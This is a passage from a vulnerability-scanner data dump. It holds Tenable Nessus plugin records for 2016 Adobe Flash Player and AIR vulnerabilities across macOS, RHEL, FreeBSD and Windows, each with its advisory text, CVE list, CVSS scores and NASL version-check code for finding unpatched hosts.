value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_air_installed.nasl\");\n script_require_keys(\"MacOSX/Adobe_AIR/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nkb_base = \"MacOSX/Adobe_AIR\";\nversion = get_kb_item_or_exit(kb_base+\"/Version\");\npath = get_kb_item_or_exit(kb_base+\"/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\ncutoff_version = '21.0.0.198';\nfixed_version_for_report = '21.0.0.215';\n\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_report_v4(severity:SECURITY_HOLE, port:0, extra:report);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version, path);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:11:12", "description": "An update for flash-plugin is now available for Red Hat Enterprise Linux 5 Supplementary and Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Critical. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 11.2.202.621.\n\nSecurity Fix(es) :\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities, detailed in the Adobe Security Bulletin listed in the References section, could allow an attacker to create a specially crafted SWF file that would cause flash-plugin to crash, execute arbitrary code, or disclose sensitive information when the victim loaded a page containing the malicious SWF content.\n(CVE-2016-1096, CVE-2016-1097, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1101, CVE-2016-1102, CVE-2016-1103, CVE-2016-1104, CVE-2016-1105, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4109, CVE-2016-4110, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4116, CVE-2016-4117)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-16T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2016:1079)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2022-03-08T00:00:00", "cpe": 
["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2016-1079.NASL", "href": "https://www.tenable.com/plugins/nessus/91156", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:1079. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91156);\n script_version(\"2.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n \"CVE-2016-4163\"\n );\n script_xref(name:\"RHSA\", value:\"2016:1079\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2016:1079)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for flash-plugin is now available for Red Hat Enterprise\nLinux 5 Supplementary and Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Critical. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update upgrades Flash Player to version 11.2.202.621.\n\nSecurity Fix(es) :\n\n* This update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities, detailed in the Adobe Security Bulletin listed\nin the References section, could allow an attacker to create a\nspecially crafted SWF file that would cause flash-plugin to crash,\nexecute arbitrary code, or disclose sensitive information when the\nvictim loaded a page containing the malicious SWF content.\n(CVE-2016-1096, CVE-2016-1097, CVE-2016-1098, CVE-2016-1099,\nCVE-2016-1100, CVE-2016-1101, CVE-2016-1102, CVE-2016-1103,\nCVE-2016-1104, CVE-2016-1105, CVE-2016-1106, CVE-2016-1107,\nCVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108,\nCVE-2016-4109, CVE-2016-4110, CVE-2016-4111, CVE-2016-4112,\nCVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4116,\nCVE-2016-4117)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsa16-02.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2016:1079\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4109\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1110\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1098\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1099\");\n 
script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1096\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1097\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1108\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1109\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1104\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1105\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1106\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1107\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1100\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1101\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1102\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-1103\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4114\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4115\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4116\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4117\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4110\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://access.redhat.com/security/cve/cve-2016-4111\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4112\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4113\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4108\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4120\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4121\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4160\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4161\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4162\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2016-4163\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected flash-plugin package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4117\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:1079\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.621-1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.621-1.el6_8\")) flag++;\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. 
This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:27:24", "description": "Adobe reports :\n\nThese updates resolve type confusion vulnerabilities that could lead to code execution (CVE-2016-1105, CVE-2016-4117).\n\nThese updates resolve use-after-free vulnerabilities that could lead to code execution (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, CVE-2016-4121).\n\nThese updates resolve a heap buffer overflow vulnerability that could lead to code execution (CVE-2016-1101).\n\nThese updates resolve a buffer overflow vulnerability that could lead to code execution (CVE-2016-1103).\n\nThese updates resolve memory corruption vulnerabilities that could lead to code execution (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161, CVE-2016-4162, CVE-2016-4163).\n\nThese updates resolve a vulnerability in the directory search path used to find resources that could lead to code execution (CVE-2016-4116).", "cvss3": {"score": 9.8, "vector": 
"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-06-20T00:00:00", "type": "nessus", "title": "FreeBSD : flash -- multiple vulnerabilities (0c6b008d-35c4-11e6-8e82-002590263bf5)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2022-03-08T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-c6_64-flashplugin", "p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_0C6B008D35C411E68E82002590263BF5.NASL", "href": "https://www.tenable.com/plugins/nessus/91697", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. 
Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91697);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n \"CVE-2016-1106\",\n \"CVE-2016-1107\",\n \"CVE-2016-1108\",\n \"CVE-2016-1109\",\n \"CVE-2016-1110\",\n \"CVE-2016-4108\",\n \"CVE-2016-4109\",\n \"CVE-2016-4110\",\n \"CVE-2016-4111\",\n \"CVE-2016-4112\",\n \"CVE-2016-4113\",\n \"CVE-2016-4114\",\n \"CVE-2016-4115\",\n \"CVE-2016-4116\",\n \"CVE-2016-4117\",\n \"CVE-2016-4120\",\n \"CVE-2016-4121\",\n \"CVE-2016-4160\",\n \"CVE-2016-4161\",\n \"CVE-2016-4162\",\n 
\"CVE-2016-4163\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/03/24\");\n\n script_name(english:\"FreeBSD : flash -- multiple vulnerabilities (0c6b008d-35c4-11e6-8e82-002590263bf5)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Adobe reports :\n\nThese updates resolve type confusion vulnerabilities that could lead\nto code execution (CVE-2016-1105, CVE-2016-4117).\n\nThese updates resolve use-after-free vulnerabilities that could lead\nto code execution (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107,\nCVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108,\nCVE-2016-4110, CVE-2016-4121).\n\nThese updates resolve a heap buffer overflow vulnerability that could\nlead to code execution (CVE-2016-1101).\n\nThese updates resolve a buffer overflow vulnerability that could lead\nto code execution (CVE-2016-1103).\n\nThese updates resolve memory corruption vulnerabilities that could\nlead to code execution (CVE-2016-1096, CVE-2016-1098, CVE-2016-1099,\nCVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109,\nCVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114,\nCVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161,\nCVE-2016-4162, CVE-2016-4163).\n\nThese updates resolve a vulnerability in the directory search path\nused to find resources that could lead to code execution\n(CVE-2016-4116).\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb16-15.html\");\n # https://vuxml.freebsd.org/freebsd/0c6b008d-35c4-11e6-8e82-002590263bf5.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7ddc0f2e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/06/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/06/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-c6_64-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-f10-flashplugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6-flashplugin<11.2r202.621\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-c6_64-flashplugin<11.2r202.621\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"linux-f10-flashplugin<11.2r202.621\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-18T15:17:30", "description": "The remote Windows host is missing KB3163207. It is, therefore, affected by multiple vulnerabilities :\n\n - Multiple type confusion errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1105, CVE-2016-4117)\n\n - Multiple use-after-free errors exist that allow an attacker to execute arbitrary code. (CVE-2016-1097, CVE-2016-1106, CVE-2016-1107, CVE-2016-1108, CVE-2016-1109, CVE-2016-1110, CVE-2016-4108, CVE-2016-4110, CVE-2016-4121)\n\n - A heap buffer overflow condition exists that allows an attacker to execute arbitrary code. (CVE-2016-1101)\n\n - An unspecified buffer overflow exists that allows an attacker to execute arbitrary code. (CVE-2016-1103)\n\n - Multiple memory corruption issues exist that allow an attacker to execute arbitrary code. 
(CVE-2016-1096, CVE-2016-1098, CVE-2016-1099, CVE-2016-1100, CVE-2016-1102, CVE-2016-1104, CVE-2016-4109, CVE-2016-4111, CVE-2016-4112, CVE-2016-4113, CVE-2016-4114, CVE-2016-4115, CVE-2016-4120, CVE-2016-4160, CVE-2016-4161, CVE-2016-4162, CVE-2016-4163)\n\n - A flaw exists when loading dynamic-link libraries. An attacker can exploit this, via a specially crafted .dll file, to execute arbitrary code. (CVE-2016-4116)\n\nNote: KB3163207 replaces KB3157993 which did not address CVE-2016-4117.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-10T00:00:00", "type": "nessus", "title": "MS16-064: Security Update for Adobe Flash Player (3163207)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1096", "CVE-2016-1097", "CVE-2016-1098", "CVE-2016-1099", "CVE-2016-1100", "CVE-2016-1101", "CVE-2016-1102", "CVE-2016-1103", "CVE-2016-1104", "CVE-2016-1105", "CVE-2016-1106", "CVE-2016-1107", "CVE-2016-1108", "CVE-2016-1109", "CVE-2016-1110", "CVE-2016-4108", "CVE-2016-4109", "CVE-2016-4110", "CVE-2016-4111", "CVE-2016-4112", "CVE-2016-4113", "CVE-2016-4114", "CVE-2016-4115", "CVE-2016-4116", "CVE-2016-4117", "CVE-2016-4120", "CVE-2016-4121", "CVE-2016-4160", "CVE-2016-4161", "CVE-2016-4162", "CVE-2016-4163"], "modified": "2022-03-08T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "SMB_NT_MS16-064.NASL", "href": "https://www.tenable.com/plugins/nessus/91013", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91013);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/08\");\n\n script_cve_id(\n \"CVE-2016-1096\",\n \"CVE-2016-1097\",\n \"CVE-2016-1098\",\n \"CVE-2016-1099\",\n \"CVE-2016-1100\",\n \"CVE-2016-1101\",\n \"CVE-2016-1102\",\n \"CVE-2016-1103\",\n \"CVE-2016-1104\",\n \"CVE-2016-1105\",\n 
